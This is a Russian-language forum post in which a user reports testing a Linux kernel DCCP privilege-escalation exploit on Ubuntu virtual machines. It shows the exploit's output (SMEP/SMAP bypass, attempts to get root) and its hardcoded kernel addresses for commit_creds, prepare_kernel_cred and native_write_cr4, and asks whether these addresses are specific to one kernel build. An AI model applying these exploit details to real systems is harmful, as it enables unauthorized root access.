Показать сообщение отдельно
Старый 02.03.2017, 19:15   #2
Ravenous
 
Аватар для Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

SynQ, пока грусть и печаль...

3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
1. user@user-VirtualBox:~/2$ ./pwn
Цитата:
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x401fa8
[.] done
[.] should be root now
[.] checking if we got root
[-] something went wrong =(
[!] don't kill the exploit binary, the kernel will crash
Не сработал, но и не повис систему. Это ubuntu 14.04 x64 (virtualbox)

Далее скачал Ubuntu 16.04 x64 с ядром 4.4 как в эксплоите.
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Цитата:
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
На этом виртуалка повисла.... (Vmware)

То что выше это готовый эксп под любую систему с поддержкой сокетов DCCP и ядра от с 2.6.14 ?
Или полурабочий PoC под конкретную сборку?

Влияют ли как-то адресса и значение если использовать эксп не только там, где тестировал автор?

Код:
// Needed for local root.
#define COMMIT_CREDS		0xffffffff810a2840L
#define PREPARE_KERNEL_CRED	0xffffffff810a2c30L
#define SHINFO_OFFSET		1728

// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4	0xffffffff81064550ul
#define CR4_DESIRED_VALUE	0x406e0ul
#define TIMER_OFFSET		(728 + 48 + 104)

#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64

Последний раз редактировалось Ravenous; 02.03.2017 в 19:27..
Ravenous вне форума   Ответить с цитированием